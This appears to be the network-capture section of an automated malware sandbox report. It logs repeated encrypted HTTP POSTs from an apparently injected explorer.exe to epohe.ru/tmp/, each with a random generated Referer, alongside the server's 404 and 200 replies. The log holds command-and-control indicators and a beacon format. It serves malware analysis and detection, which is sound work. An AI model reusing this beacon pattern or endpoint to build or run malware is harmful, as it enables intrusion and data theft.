                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.6497192.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:40.556700945 CEST269OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://nysunlaoxsnx.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 221
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:40.556734085 CEST221OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 25 0f f9 ab
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu%RAmHE4geIg=r4T;_%C XV]Y]`7-HqRFKJWj=8|d
                                                  Sep 2, 2024 08:20:41.704777956 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.6497202.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:41.713304996 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://mngbwwbxxtu.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 117
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:41.713325024 CEST117OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 29 49 a6 8a
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu)IuCBw RJseZHq
                                                  Sep 2, 2024 08:20:42.945909023 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:42 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.6497222.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:42.955528021 CEST269OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://mtxcnwqijndc.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 140
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:42.955600977 CEST140OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 4c 31 fb ac
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuL1Qgk$>,?>OMPzdD1@xN~
                                                  Sep 2, 2024 08:20:44.470120907 CEST137INHTTP/1.1 200 OK
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:44 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.6497232.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:44.478555918 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://lbbemhvyacupfj.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 160
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:44.478583097 CEST160OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 34 05 b5 ec
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu4@zbHtRL=,byGHILtqxYE
                                                  Sep 2, 2024 08:20:46.136173010 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:45 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.6497242.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:46.143955946 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://pnkjbaopqllltj.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 247
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:46.143980026 CEST247OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6f 5d e3 af
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuo]{1@d`N\Kem4szL)JBM(% VgfwcN&vld2T|\k"zBLM@Z; Wp
                                                  Sep 2, 2024 08:20:49.003756046 CEST137INHTTP/1.1 200 OK
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:48 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.6497252.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:49.012497902 CEST272OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://xabepmucutwrclm.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 224
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:49.012527943 CEST224OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 20 1f d6 f3
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu XAsvq"Lo_^2\b/NpWK@ds8xgx2F?tI%9W~:c~`iul
                                                  Sep 2, 2024 08:20:50.181823015 CEST137INHTTP/1.1 200 OK
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:49 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.6497262.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:50.189841986 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ciagjuvshwyap.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 363
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:50.189861059 CEST363OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 48 18 de 8f
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuH/hkBy4aU#/32\AYi9D$aJ_|%&gU;H m&Zx!*O2@59Gb&csLW
                                                  Sep 2, 2024 08:20:51.829910994 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.6497272.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:51.837527990 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://dlseqphhdlmhj.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 161
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:51.837546110 CEST161OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 56 08 ae ff
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuVZd`laP`8KK.hz#7FOCA_fcPS!
                                                  Sep 2, 2024 08:20:53.004174948 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:52 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.6497282.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:53.014969110 CEST272OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://oydqaptimmqlwlr.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 264
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:53.014986038 CEST264OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 6f 41 ae 9e
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuoAH.d|Gw7dO2rAX@bF7u%/&LO-BJa~4AC;R+pZAE?;7fZ|3 X/4!
                                                  Sep 2, 2024 08:20:55.344763041 CEST137INHTTP/1.1 200 OK
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:54 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.6497292.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:55.353796959 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ubqxonkbwrw.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 141
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:55.353818893 CEST141OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7f 25 b8 90
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu%E[tEzNE!vavm{"B+.9*
                                                  Sep 2, 2024 08:20:56.464382887 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:56 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.6497302.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:56.472636938 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://llwvqfhgyhhpg.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 271
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:56.472665071 CEST271OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 40 48 be ed
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu@HxL]S]`c*c]/y\_!]gl6X5MT%,D2#X#k9lJyeh\Y;X"u\{zr$TKy
                                                  Sep 2, 2024 08:20:57.632760048 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:57 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
